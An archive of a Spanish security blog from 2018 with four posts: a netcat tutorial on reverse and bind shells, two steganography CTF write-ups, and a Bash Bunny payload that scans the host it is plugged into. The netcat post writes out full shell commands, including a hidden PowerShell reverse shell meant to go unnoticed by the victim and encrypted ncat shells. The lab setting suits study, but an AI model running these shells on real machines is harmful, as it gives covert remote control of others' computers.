martes, 25 de septiembre de 2018

Usando netcat para obtener una shell

Hay ocasiones en las que, por el antivirus o por la limitación que sea, nos vemos obligados a usar netcat para obtener una shell en el equipo de la víctima. Hoy explicaré cuales son los tipos de shell y como podemos hacer para obtener una en cualquier equipo en cuestión de segundos si tenemos acceso físico al dispositivo desbloqueado.

Explicación de los tipos de Shell

Reverse Shell

Este tipo de Shell quizás es el más adecuado en entornos corporativos o que haya algún firewall en la red. Consiste en que el atacante se ponga a escuchar en algún puerto en su máquina y la víctima se conecta a él.

Bind Shell

Este tipo de Shell se suele usar más cuando se compromete un equipo en la misma red. Es lo contrario a la anterior. En esta la víctima se pone a escuchar en un puerto y es el atacante quien se conecta.

Ejemplo práctico

Entorno

Para realizar estas pruebas usaré dos máquinas virtuales. Un Windows 7 y la otra Kali Linux 2018.1 aunque la versión no debería afectar para nada.

En Kali ya está instalado por defecto netcat pero en Windows no, por lo que tenemos que descargarlo. Lo podemos hacer desde aquí https://eternallybored.org/misc/netcat/netcat-win32-1.12.zip.

Reverse Shell

Para esto, usaremos la máquina Kali como atacante. Lo primero que vamos a hacer es usar netcat para escuchar en un puerto. Esto se hace con el siguiente comando:


nc -lvp 1337

Sustituyendo 1337 por el puerto que queramos. Lo podemos poner por ejemplo en el 80 para no levantar sospechas o evitar cualquier problema con el firewall.

Ahora lo siguiente será escribir el siguiente comando en el cmd de Windows.


RUTA_EJECUTABLE_NETCAT -nv IP_ATACANTE PUERTO -e cmd.exe


Y una vez le demos, en nuestra máquina Kali tendremos una Shell en la máquina Windows.



Bind Shell

Ahora sería al contrario que el caso anterior, vamos a poner a la máquina Windows a escuchar y nos conectaremos desde Kali.

Para ello tenemos que escribir el siguiente comando en el cmd:


RUTA_EJECUTABLE_NETCAT -lvp PUERTO -e cmd.exe


Ahora lo que tendríamos que hacer es conectarnos desde la otra máquina con el siguiente comando:
nc -nv IP_VICTIMA PUERTO


Y ahora ya tendríamos de nuevo una Shell en el equipo Windows.


Escondiendo la Shell

Ahora ya sabemos cómo tener una Shell en cualquier equipo, pero hay un gran problema, la consola se ve demasiado. Esto hay una forma de solucionarlo muy sencilla. Lo que tenemos que hacer es cambiar la forma en la que ejecutamos netcat. Para ejecutarlo de forma oculta tenemos que darle a la combinación de teclas Windows + R y escribimos el comando de la siguiente forma:


powershell -W Hidden RUTA_NETCAT -nv IP_ATACANTE PUERTO -e powershell.exe
Ahora en vez de ejecutarlo en el cmd vamos a ejecutarlo en un powershell, aunque si queremos podemos ejecutar la otra consola si queremos. El comando lo que haría sería ejecutar el powershell oculto. La clave está en el parámetro -W (-WindowStyle) que lo que hacemos es decirle que el estilo de la ventana sea oculto.

Por ejemplo, para una reverse Shell, una vez puesto la máquina del atacante a escuchar, lo que haríamos sería escribir el siguiente comando:


powershell -W Hidden "C:\Users\usuario\Desktop\nc.exe" -nv 192.168.217.129 1337 -e powershell.exe

Una vez ejecutemos el comando ya tendríamos una Shell en el equipo de la victima y ésta no se daría ni cuenta. Lo único que se vería, aparte de la conexión, es el proceso de netcat, pero esto un usuario normal no suele mirarlo.


Y entonces, ahora ya tendríamos una Shell en el equipo de la víctima.

Haciendo la conexión segura

Ahora, una vez visto los tipos de Shell y como ocultarla, al menos, a simple vista, vamos a llevarlo un paso más allá y vamos a cifrar la comunicación entre la víctima y el atacante.

Para ello vamos a usar ncat, que es la versión de netcat mejorada por el proyecto Nmap. Para descargarlo, podemos hacerlo en la web oficial de nmap ( https://nmap.org/ncat/ ).

Ahora para ver este ejemplo, primero vamos a poner wireshark a esnifar paquetes para comprobar como la comunicación está cifrada realmente.


Para este ejemplo, vamos a hacer una bind Shell, por lo que nos vamos a nuestra máquina Windows y la ponemos a escuchar con el siguiente comando:


RUTA_NCAT --allow IP_ATACANTE  -lvp PUERTO --exec cmd.exe --ssl

Y ahora desde la máquina Kali tenemos que poner el siguiente comando:


ncat -v IP_VICTIMA PUERTO --ssl

Y como vemos ahora en la captura de Wireshark, la conexión entre la víctima y el atacante, está cifrada.


Y esto es todo, espero que os haya gustado el artículo. Si tenéis cualquier duda podéis dejadlo en los comentarios o decírmelo por twiter (@RaSr98).

¡Un saludo!

viernes, 17 de agosto de 2018

WRITEUP RETO 12 CTF #H4F: 12+1


Nuevo reto #Stegano de @Hackers4Fun (#H4F), Balthazar ha robado un valioso diamante y nuestro deber (junto a los Minions) es evitar que se escape con él, por lo que deberemos de conseguir la #flag.






Manos a la obra

Hacemos clic en el enlace, y ya Google Drive nos está diciendo el tipo de archivo que esconde el .7z, nos lo descargamos.



Descomprimimos el archivo y efectivamente obtenemos una imagen.



La imagen pesa nada mas y nada menos que 13,1mb, por lo que tiene "gato encerrado". Vamos analizar la imagen con WinHex.



Aquí tenemos las primeras pistas, la foto esconde:

- 2 Archivos .wav (GrU_Gong_Gong.wav y GrU_sin....wav)
- Hay un .zip (output.zip)
- Un archivo de texto llamado PasS que contiene un md5.

Vamos a probar a cambiar la extensión del archivo de .jpg a .zip

Vaya! Parece que está corrupto el zip, vamos a intentar repararlo con WinRAR.

Vamos a descomprimir el archivo reparado...


Bueno, si volvemos atrás (a WinHex) aparecería una pista que nos daba un archivo (dentro del comprimido) llamado P4sS que contiene el siguiente texto "b655414fa3b4348f144712dfa04d8291".



Usamos MD5 Decrypter :


Si señor, la password es: 3v1lBr4t

Descomprimimos el .zip usando la password y ahora sí que tenemos los dos archivos .wav

Continuamos con el reto, ejecutamos el archivo "GrU_Gong_Gong.wav" y escuchamos unos pitidos cortos y largos, por lo que parece es "morse".

Abrimos el .wav con Audacity, aquí tenemos dos opciones:

Opción 1: Poner el modo "spectrogram" (usé Sonic Visualizer, me gusta mas el spectrogram) y traducir el morse:


Opción 2 (esta fue la que usé): Abrir Audacity y usar la opción "Reducción de ruido" y usar el otro .wav (GrU_sin...), así quitaremos la canción y nos quedaremos sólo con el código morse.

Una vez limpio el audio, lo subimos a esta web https://morsecode.scphillips.com/labs/decoder/


Otra password? Aún continua el reto... Una de steghide? Probemos!


Con Steghide (y la ayuda de la password del morse) sacamos el archivo oculto "b64.txt", hacemos un "cat" y leemos su contenido.

Es un código en "base64", lo decodeamos en "cristiano" y por fin tenemos la flag es: H4F{St3Go_K4r40K3}




Agradecer al equipo de Hackers4Fun por el gran trabajo que hacen con sus retos y eventos. Hasta la próxima.

sábado, 14 de julio de 2018

Writeup Reto 12 CTF #H4F: Emma-ne-de-fur-fur?


Nuevo reto "especial verano" de la mano de @Hackers4Fun (#H4F) donde se ha interceptado un fragmento de código en un email remitido por Tim a Flint "Loco" (El prota de "Lluvia de albóndigas") y deberemos de encontrar lo que esconde.


Manos a la obra

Descargamos y descomprimos con WinRAR el archivo "R3t0_12_H4f.gz" que contiene el siguiente enlace: https://drive.google.com/file/d/1iG_lNnMSU05-kjvbhk9Sk_GMCGnbO-Y1

Nos encontramos con lo que parece un archivo PDF, si lo ejecutamos nos encontraremos con el siguiente texto:


Observamos que es código HTML con una imagen codificada en base64, simplemente seleccionamos todo el código y lo colocamos en cualquier editor de texto (I love you sublime text) y guardamos en .html

Ejecutamos el archivo .html y vemos la siguiente imagen.bmp:


Nos la descargamos y la analizamos con diferentes herramientas (exiftool,binwalk y stegsolve) pero sin ninguna pista que me sirviera de ayuda.

Después de unos minutos de bloqueo, me cambié las gafas "3D" por las lentes graduadas (simplemente limpié los cristales xD) me tropecé con unos extraños pixels que no venían "a cuento" con la imagen. 

Hice zoom y encontré esto:


Es un mensaje en morse! Si tiramos de Photoshop (también sirve Gimp o Fireworks) y jugamos con los niveles podemos conseguir una imagen mas clara, mas o menos lo dejé así:


Con el código mas visible, usamos la tool online y nos dará el siguiente mensaje:


Nos da lo que parece un tipo de "hash" por lo que habrá que hacerle un reversing para continuar con el juego. 

Primero identifiquemos el tipo de hash que hemos obtenido:


Al parecer se trata de un MD5, probamos con MD5decrypt y md5hashing y sin éxito, si ponemos en google "Reverse md5" nos aparece una web llamada GROMWEB y nos proporciona el siguiente mensaje:


Tenemos nuevas pistas! Sabemos que la imagen contiene un archivo oculto, que estará protegido con contraseña y que para extraerlo no podemos usar "Steghide". Por lo que tendremos que usar otras herramientas similares a esta.

Tras probar 4 herramientas diferente, encuentro OpenStego y vemos que nos pide la contraseña y nos exporta un nuevo archivo (level up!)


Hacemos un "cat" y vemos que ahora tenemos un archivo codificado en binario:


Son mas de 300 líneas de binario sin sentido alguno, pruebo abrirlo con bloc de notas y observamos que contiene una especie de "ASCII Art":


Necesitamos alejar el "zoom" para poder llegar a leerlo con mas claridad, el paso siguiente es abrirlo WordPad:


¡Es un código QR! (momento en el que me doy cuenta de la pista en el nombre del archivo..."Fl4g_Qr" xD)

Tras los fallidos intentos de leerlo con lectores online y con mi móvil, nos leemos la wiki de cómo funciona un QR


Sabemos que la base es que se distingan los pixels negro y blanco, por lo que se me ocurre hacer sustitución de caracteres.

Edito el archivo y modifico los "0" que hacen de fondo por un espacio en "blanco" (tecla space):


Y el resultado es este:


Hago otra prueba con el lector de mi móvil y aún es incapaz de leerlo, por lo que se me ocurre repasar "a mano" los pixels en negro con un editor de imágenes (yo utilicé Fireworks).

Sé que si lograba editar al menos la mitad del código QR y conseguir un buen contraste (blanco y negro) podría leer la información que oculta.

Unos minutos después....

Le apuntamos con nuestro móvil (en mi caso, iPhone):


¡Y voilà! La flag es: H4F{H4pPy_H0l1D4Ys}


Ciberconsejos: 

- Un .bmp puede tener mas de un secreto oculto.

- "Aunque los retos de hacking, como en la vida son complicados, pensad que mas complicado es ver a un "chino" echando gasolina". (Asiáticos! Es una cariñosa broma) 

Agradecer al equipo de Hackers4Fun por entretenernos con sus retos y HackPlayers por la mención en su blog.

Hasta la próxima hackers!

sábado, 30 de junio de 2018

Jugando con el conejo - Parte 2

¡Hola! En este segundo artículo sobre el Bash Bunny explicaré paso a paso cómo crear nuestro primer payload.


Lo primero que tenemos que saber es que estos payloads normalmente están escritos en un lenguaje sospechosamente parecido a BASH, llamado Bunny Script, por lo que es muy recomendable saber algo de este lenguaje antes de ponernos a crearlo.

Bunny Script

El Bunny Script tiene una serie comandos para hacer todo el payload.
  • ATTACKMODE sirve para especificar la combinación de dispositivos a emular, como podría ser una tarjeta de red, un teclado o un dispositivo de almacenamiento.
  • QUACK, introduce una pulsación de tecla, una cadena o le podemos indicar un archivo .txt con un Ducky Script.
  • LED, controla el color y el estado del led. Aparte de indicarle un color, podemos indicarle unos patrones ya preestablecidos, como puede ser FINISH, FAIL o SETUP.
  • Q, es un alias de QUACK.
  • DUCKY_LANG sirve indicar el idioma del teclado que se usa para el QUACK.

Modos de ataque

Los distintos modos de ataque son:
  • SERIAL
  • ECM_ETHERNET
  • RNDIS_ETHERNET
  • AUTO_ETHERNET*
  • STORAGE
  • HID
  • OFF
Hay que hacer un inciso e indicar que ECM_ETHERNET sólo sirve para Linux, Mac y Android, mientras que RNDIS_ETHERNET sirve para Windows y para algún Linux. Los modos de ataque podemos combinarlos como queramos, excepto aquellos que impliquen los dos adaptadores de red a la vez. En el último firmware (el 1.5) se ha añadido el modo de ataque llamado AUTO_ETHERNET el cuál sirve para usar automáticamente un modo de tarjeta de red u otro.

Creando el script

Una vez visto un poco de aburrida teoría vamos a crear un payload simple. Lo que vamos a hacer es, primero, poner el modo de ataque para emular una tarjeta de red para que, a continuación, realice un escaneo con nmap y nos guarde el resultado en un .txt. Lo primero vamos a indicarle que el LED se ponga con los colores de SETUP y se ponga en modo de ataque de tarjeta de red.

LED SETUP

ATTACKMODE AUTO_ETHERNET
A continuación vamos a obtener para usarlo a continuación la IP de que se le ha asignado a la máquina y el nombre de la misma.

GET TARGET_IP
GET TARGET_HOSTNAME

La carpeta /root/udisk es la misma que vemos cuando conectamos el conejo en modo armado.
Ahora antes de continuar vamos a comprobar por si no se ha asignado la IP al equipo para abortar el script si fuera necesario. Antes de salirnos le indicamos que ponga el led en FAIL.

if [ -z "${TARGET_IP}" ]; then
   LED FAIL
   exit 1
fi
Ahora viene la parte más interesante, que es donde hacemos el escaneo. Para ello simplemente ponemos el led en modo ATTACK y lanzamos nmap. Para guardar el escaneo, redirigimos la salida del comando a un archivo en la carpeta /root/udisk/loot.

LED ATTACK
nmap -O $TARGET_IP >> /root/udisk/loot/${TARGET_HOSTNAME}.log

nmap $NMAP_OPTIONS $TARGET_IP >> /root/udisk/loot/${TARGET_HOSTNAME}.log
Una vez hecho esto, simplemente le hacemos un sync para sincronizar los datos y evitar perderlos. Antes de hacerlo ponemos el led en modo CLEANUP y al finalizar, FINISH.

LED CLEANUP
sync

LED FINISH


Hay que aclarar, que el modo del led no influye para nada en el funcionamiento del aparato, simplemente es para que nosotros veamos rápidamente cómo va el ataque.

Y para los que seáis de copiar y pegar el script directamente, aquí lo tenéis:

LED SETUP
ATTACKMODE AUTO_ETHERNET

GET TARGET_IP
GET TARGET_HOSTNAME


if [ -z "${TARGET_IP}" ]; then
   LED FAIL
exit 1
fi

LED ATTACK
nmap $NMAP_OPTIONS $TARGET_IP >> /root/udisk/loot/${TARGET_HOSTNAME}.log

LED CLEANUP
sync

LED FINISH

Probando el payload

Todo esto es muy bonito, pero ahora vamos a verlo realmente en acción.

Para ello, lo primero que hay que hacer es introducir el payload en una de las carpetas (switch1 o switch2) habiendo conectado previamente el conejo en modo armado.

Una vez puesto el payload, extraemos el equipo con seguridad y procedemos a ponerlo en el modo de ataque que corresponda.
Y, ¡ya sólo faltaría enchufarlo en algún tu ordenador!.
Para que se vea lo que tardaría este ataque en completarse podemos ver el siguiente video:


Si te has quedado con ganas de indagar más, puedes ver la wiki oficial ( https://wiki.bashbunny.com/#!payload_development.md ).
Un saludo, Rafa Sojo (@RaSr98).




lunes, 25 de junio de 2018

Writeup Reto H4F Stegano: Try 3v3r1Tb1ng


Nuevo reto de Stegano/OSINT, donde tendremos que ayudar a Judy H. (Conejita de Zootrópolis) y a Nick W. (el zorro estafador) a investigar las desapariciones.


Manos a la obra

Nos descargamos la imagen del enlace de Google Drive.

Imagen del reto
La analizamos con exiftool, una de mis herramientas favoritas:


No se observa ninguna evidencia o pista que nos pueda ayudar, vamos a usar "Stegsolve", vamos pasando por los diferentes tipos de planos y......Bingo! tenemos un código de barras.


Exactamente, es un código de barras del tipo Data Matrix, usamos un lector de códigos online y lograremos leer su contenido.


Una vez leído, nos muestra un código en base64, podemos usar para ello ASCII to Hex:


Otro link! Está claro que no nos lo iban a poner fácil....(abriendo otra caja de Paracetamol de 1g)

Entramos en el enlace y nos descargamos el archivo "H4F_Reto_11_.7z", lo descomprimimos y nos aparecerá una carpeta con los siguientes ficheros:


Tenemos 5 imágenes y un archivo de audio en formato .wav. La inercia me lleva a reproducir el archivo de audio, en él se encuentra las instrucciones para resolver el reto (eso sí, el audio está en inglés):

Texto del audio:

Analizando el texto:

1. Nos dice que tenemos el flag "oculta" en este fichero (en el .wav, claro).

2. Indica como "pista" que es importante que usemos "reverse image".

3. También nos dice que la contraseña es cada uno de los distritos, todo junto, en minúsculas y sin exceder los 37 caracteres.

Pues empecemos, para hacer "reverse image" existen varias OSINT TOOLS, pero yo usé "Google Images".

Nota: Para no hacer muy largo, este paso sólo lo haré con la primera imagen, pero son los mismos pasos para el resto de fotos.

Analizamos la primera imagen:


Hacemos clic a cualquiera de los dos enlaces (nos lleva al mismo sitio) y veremos una "wiki" con toda la información del sitio, incluyendo la foto completa de la torre y la localización de esta.


La primera imagen nos lleva al distrito: Sahara Square.

Continuamos usando los mismos pasos con el resto de imágenes y se nos debería de quedar así:

1. Sahara Square
2. Tundratwon
3. Rainforest
4. Savanna
5. Little Rodentia

Por lo tanto, la clave para obtener nuestra flag es: saharatundrarainforestsavannarodentia

Nos dirigimos a la terminal para ejecutar "Steghide" y extraemos el archivo del .wav.


Ahora si, leemos el archivo "Fl4g_b64.txt" y nos dará otro código en base64, decodeamos y nos dará la flag.


La flag es: H4F{B3llw3ther_C0nf13s4}

Caso cerrado, como diría el gran John "Hannibal" Smith (Team A)...."Me encanta que los planes salgan bien" ("purito" incluido, por supuesto).



Hasta otra hackers!!!